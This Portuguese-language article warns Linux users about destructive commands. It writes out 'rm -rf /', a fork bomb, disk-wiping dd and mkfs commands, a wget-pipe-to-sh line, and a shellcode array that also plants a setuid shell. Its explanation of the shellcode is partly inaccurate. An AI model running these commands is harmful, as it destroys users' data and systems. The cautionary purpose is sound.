Comandos que podem danificar seu sistema Linux
Comandos que podem danificar seu sistema – Segurança no Linux
Neste artigo vou mostrar diversos comandos e combinações de comandos que são potencialmente perigosos e que podem destruir seu sistema Linux, tornando-o inutilizável completamente (ou parcialmente).
Há uma série de comandos e combinações de comandos que são extremamente perigosos em seu ambiente Linux, especialmente se você utiliza o sistema como usuário root para tarefas normais.
É importante conhecer alguns desses comandos para evitar problemas sérios em seu sistema.
Vamos aos comandos:
rm -rf
O comando rm -rf é uma forma rápida de apagar uma pasta e seu conteúdo. Mas qualquer erro pode resultar em perda de dados – geralmente irrecuperável. Vejamos algumas opções:
rm -r Apaga uma pasta recursivamente
rm -f Remover arquivos somente-leitura sem perguntar.
rm -rf / Força a exclusão de tudo no diretório raiz.
rm -rf * Força a exclusão de tudo no diretório atual.
rm -rf . Força a exclusão do diretório atual e suas sub-pastas.
Fork Bomb
:(){ :|:& };:
Esse comando é uma fork bomb. Ele funciona definindo uma função chamada ‘:‘, a qual chama a si mesma duas vezes, uma em foreground (primeiro plano) e outra em background.
Ela continua executando continuamente até congelar o sistema, por falta de recursos.
mv pasta /dev/null
Esse comando moverá ‘pasta‘ para o dispositivo /dev/null.
No Linux, o dispositivo /dev/null ou null é um arquivo especial que descarta todos os dados escritos nele e informa que a operação de escrita foi bem-sucedida.
Exemplo:
# mv /home/ana/* /dev/null
wget http://fontemaliciosa -O- | sh
Esse comando irá baixar um script da Internet, o qual pode estar em uma fonte maliciosa de dados, e então o executará por meio do shell sh.
> arquivo
O caractere > pode ser usado para apagar o conteúdo de um arquivo.
Se esse comando for executado inadvertidamente, como por exemplo “> arquivo.conf”, todo o conteúdo do arquivo arquivo.conf será sobrescrito e, dessa forma, perdido.
dd if=/dev/random of=/dev/sda
Já esse comando irá apagar o dispositivo de blocos sda e escreverá dados aleatórios nele.
Como seu sistema provavelmente está instalado nesse dispositivo, estará perdido e irrecuperável.
mkfs.ext3 /dev/sda
Este comando formata o dispositivo de blocos sda e então o disco terá seu conteúdo totalmente apagado – como se fosse um disco novo.
rm -rf "oculto"
char esp[] __attribute__ ((section(".text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Essa sequência de caracteres toda nada mais é que o comando rm -rf, porém representado em códigos hexadecimais, de modo a enganar quem não conheça esse tipo de representação. Se esse comando for executado no terminal, a partição principal do sistema será totalmente apagada.
Assista a um vídeo de demonstração dos comandos mostrados que podem danificar o sistema Linux para ver o poder destrutivo que eles podem ter:
Escreva um comentário